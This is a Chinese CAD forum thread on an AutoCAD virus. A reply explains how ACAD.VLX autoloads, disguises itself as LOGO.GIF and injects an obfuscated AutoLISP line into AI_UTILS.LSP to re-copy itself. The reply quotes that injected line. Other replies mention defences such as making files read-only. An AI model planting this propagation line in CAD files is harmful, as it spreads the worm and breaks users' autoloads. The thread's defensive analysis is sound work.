明经CAD社区

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
123
返回列表 发新帖
楼主: 林霄云

[讨论] acaddoc.lsp病毒破防(重磅解析源码级别)

  [复制链接]
发表于 2014-12-1 16:24:49 | 显示全部楼层
我以前都是设置只读来防御的
发表于 2015-10-30 16:06:58 | 显示全部楼层
作者不错欧,有时间可以教教我么。
发表于 2015-11-11 09:15:19 | 显示全部楼层
再来一贴:
病毒载体文件:ACAD.VLX。该文件本身为 ACAD的自动加载机制的一个固定名称的自动加载文件,病毒伪装成合法文件搞鬼。
感染方式:打开一幅DWG时,ACAD.VLX 如与DWG在一个目录,则ACAD.VLX被自动加载;
         加载后动作:
            (1) 将自身复制为 {ACADSysPath}\Help\ LOGO.GIF,伪装成图片文件。
            (2) 寻找另一个自动加载文件(优先级比自身高?),如AI_UTILS.LSP,将一行代码嵌入其中,代码行为:
          (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))
         意为将 LOGO.GIF 拷贝为 ACAD.VLX(且复制的目标路径为CAD的当前路径),作用为完成自身复制,用于传染。

破坏性:ACAD.VLX本身为自动加载文件,会屏蔽系统的其它自动加载文件。
回复 支持 1 反对 0

使用道具 举报

 楼主| 发表于 2015-11-11 10:55:25 | 显示全部楼层
guohq 发表于 2015-11-11 09:15
再来一贴:
病毒载体文件:ACAD.VLX。该文件本身为 ACAD的自动加载机制的一个固定名称的自动加载文件,病毒 ...

厉害、我也就年轻的时候瞎折腾。鄙人拙作是极不专业的,我是设计师。
发表于 2019-9-8 19:47:05 | 显示全部楼层
下载下来看看,不知道能不能防毒
发表于 2019-9-8 22:13:51 | 显示全部楼层
有病毒杀就完了,没必要说的那么透,双刃剑哈
发表于 2019-9-14 21:56:39 | 显示全部楼层
感谢分享,照顾周到
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|CAD论坛|CAD教程|CAD下载|联系我们|关于明经|明经通道 ( 粤ICP备05003914号 )  
©2000-2023 明经通道 版权所有 本站代码,在未取得本站及作者授权的情况下,不得用于商业用途

GMT+8, 2024-11-24 18:10 , Processed in 0.154596 second(s), 19 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表